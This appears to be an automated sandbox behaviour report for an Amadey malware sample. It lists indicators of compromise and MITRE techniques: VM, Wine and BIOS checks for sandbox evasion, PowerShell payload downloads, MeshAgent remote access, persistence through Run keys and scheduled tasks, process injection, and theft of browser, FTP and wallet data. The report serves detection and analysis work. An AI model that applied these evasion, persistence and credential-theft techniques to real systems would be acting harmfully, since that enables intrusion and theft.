amadey | 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808

Virtualization/Sandbox Evasion

Processes:

64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exe

pid process

5684 powershell.exe
3300 powershell.EXE
4708 powershell.exe
5928 powershell.exe
2188 powershell.exe
3288 powershell.exe
Downloads MZ/PE file

pid	process
5684	powershell.exe
3300	powershell.EXE
4708	powershell.exe
5928	powershell.exe
2188	powershell.exe
3288	powershell.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

Processes:

meshagent32-group.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" "	meshagent32-group.exe

Checks BIOS information in registry 2 TTPs 9 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

axplong.exe64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exeaxplong.exeaxplong.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exeaxplong.execrypteda.exeNework.exesplwow64.exeInstall.exeWaters.pif

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	crypteda.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	Nework.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	splwow64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	Waters.pif

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url	cmd.exe

Executes dropped EXE 34 IoCs

Processes:

axplong.exegold.execrypteda.exeD9qjU3T0tH.exeM4ceNWFoxe.exeNework.exeHkbsse.exestealc_default2.exeneedmoney.exepenis.exebundle.exesvchost015.exeacentric.exe2.exesplwow64.execrypted.exe385121.exeInstall.exeInstall.exeWaters.pifaxplong.exeHkbsse.exeInstalleraus.exemeshagent32-group.exeMeshAgent.exe66ed8969a40d8_15_20240920173635.exeMeshAgent.exeInstall.exeaxplong.exechannel3.exeMeshAgent.exeMeshAgent.exeVMfZdiW.exeMeshAgent.exe

pid	process
3880	axplong.exe
380	gold.exe
832	crypteda.exe
2524	D9qjU3T0tH.exe
4368	M4ceNWFoxe.exe
64	Nework.exe
400	Hkbsse.exe
2300	stealc_default2.exe
4804	needmoney.exe
2988	penis.exe
4408	bundle.exe
4980	svchost015.exe
2936	acentric.exe
1716	2.exe
1988	splwow64.exe
2136	crypted.exe
3984	385121.exe
888	Install.exe
5088	Install.exe
4428	Waters.pif
4036	axplong.exe
1584	Hkbsse.exe
660	Installeraus.exe
412	meshagent32-group.exe
2320	MeshAgent.exe
5916	66ed8969a40d8_15_20240920173635.exe
6088	MeshAgent.exe
5128	Install.exe
4956	axplong.exe
5464	channel3.exe
1212	MeshAgent.exe
3256	MeshAgent.exe
5756	VMfZdiW.exe
4184	MeshAgent.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
Key opened	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine	axplong.exe

Indirect Command Execution 1 TTPs 17 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

Processes:

forfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exe

pid	process
3716	forfiles.exe
5580	forfiles.exe
5624	forfiles.exe
728	forfiles.exe
5216	forfiles.exe
1520	forfiles.exe
4308	forfiles.exe
4948	forfiles.exe
3084	forfiles.exe
5420	forfiles.exe
924	forfiles.exe
1212	forfiles.exe
4564	forfiles.exe
2360	forfiles.exe
5444	forfiles.exe
2920	forfiles.exe
5540	forfiles.exe

Loads dropped DLL 3 IoCs

Processes:

2.exestealc_default2.exe

pid process

1716 2.exe
2300 stealc_default2.exe
2300 stealc_default2.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1716	2.exe
2300	stealc_default2.exe
2300	stealc_default2.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

Processes:

axplong.exeacentric.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\splwow64.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000287001\\splwow64.exe"	axplong.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\acentric = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\acentric.exe\" /update"	acentric.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

Install.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

179 api64.ipify.org
180 api64.ipify.org
181 ipinfo.io
182 ipinfo.io

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

flow	ioc
179	api64.ipify.org
180	api64.ipify.org
181	ipinfo.io
182	ipinfo.io

Drops file in System32 directory 64 IoCs

Processes:

MeshAgent.exeMeshAgent.exeMeshAgent.exeMeshAgent.exeInstall.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\695EB6BB7D52BE5411AEF090F78AC981ED62C7E0	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\exe\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shcore.pdb	MeshAgent.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\bcrypt.pdb	MeshAgent.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

3120 tasklist.exe
4084 tasklist.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exeaxplong.exeaxplong.exeaxplong.exe

pid process

2560 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
3880 axplong.exe
4036 axplong.exe
4956 axplong.exe

pid	process
3120	tasklist.exe
4084	tasklist.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

gold.exeneedmoney.exe2.execrypted.exe66ed8969a40d8_15_20240920173635.exe

description	pid	process	target process
PID 380 set thread context of 4556	380	gold.exe	RegAsm.exe
PID 4804 set thread context of 4980	4804	needmoney.exe	svchost015.exe
PID 1716 set thread context of 3336	1716	2.exe	aspnet_regiis.exe
PID 2136 set thread context of 4572	2136	crypted.exe	RegAsm.exe
PID 5916 set thread context of 5240	5916	66ed8969a40d8_15_20240920173635.exe	RegAsm.exe

Drops file in Program Files directory 14 IoCs

Processes:

MeshAgent.exeMeshAgent.exeVMfZdiW.exeMeshAgent.exemeshagent32-group.exeMeshAgent.exe

description	ioc	process
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files (x86)\KworwGpsU\wUzxXa.dll	VMfZdiW.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.exe	meshagent32-group.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe

Drops file in Windows directory 8 IoCs

Processes:

splwow64.exeschtasks.exeschtasks.exe64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exeNework.exe

description	ioc	process
File opened for modification	C:\Windows\ViewpictureKingdom	splwow64.exe
File opened for modification	C:\Windows\BrandonBlind	splwow64.exe
File opened for modification	C:\Windows\IpaqArthur	splwow64.exe
File created	C:\Windows\Tasks\bMRcrYTbxyvtsWXpEp.job	schtasks.exe
File created	C:\Windows\Tasks\ECzxLUloJBwCJADCK.job	schtasks.exe
File created	C:\Windows\Tasks\axplong.job	64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
File created	C:\Windows\Tasks\Hkbsse.job	Nework.exe
File opened for modification	C:\Windows\HardlyAircraft	splwow64.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

3684 3336 WerFault.exe aspnet_regiis.exe
1340 5128 WerFault.exe Install.exe

pid	pid_target	process	target process
3684	3336	WerFault.exe	aspnet_regiis.exe
1340	5128	WerFault.exe	Install.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

wmic.exereg.exewmic.exeforfiles.exeInstall.exereg.exereg.exeM4ceNWFoxe.exeHkbsse.execmd.execmd.exewmic.exewmic.exepowershell.exestealc_default2.exesplwow64.exereg.exereg.exereg.exewmic.exeVMfZdiW.exereg.exeRegAsm.exeInstall.execmd.exeschtasks.exeInstall.execmd.exereg.exeschtasks.exeMeshAgent.exetasklist.exereg.exereg.exewmic.exereg.exereg.exereg.exewmic.exeschtasks.exeforfiles.execmd.exereg.exewmic.exereg.exebundle.execmd.execmd.exegpupdate.exeMeshAgent.exereg.exereg.execmd.exefindstr.exereg.execmd.exereg.exereg.exereg.exeforfiles.exepowershell.exewmic.exereg.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	M4ceNWFoxe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	splwow64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VMfZdiW.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bundle.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gpupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

stealc_default2.exechannel3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	channel3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	channel3.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeInstall.exeMeshAgent.exeVMfZdiW.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f171a6e7-0000-0000-0000-d01200000000}\NukeOnDelete = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
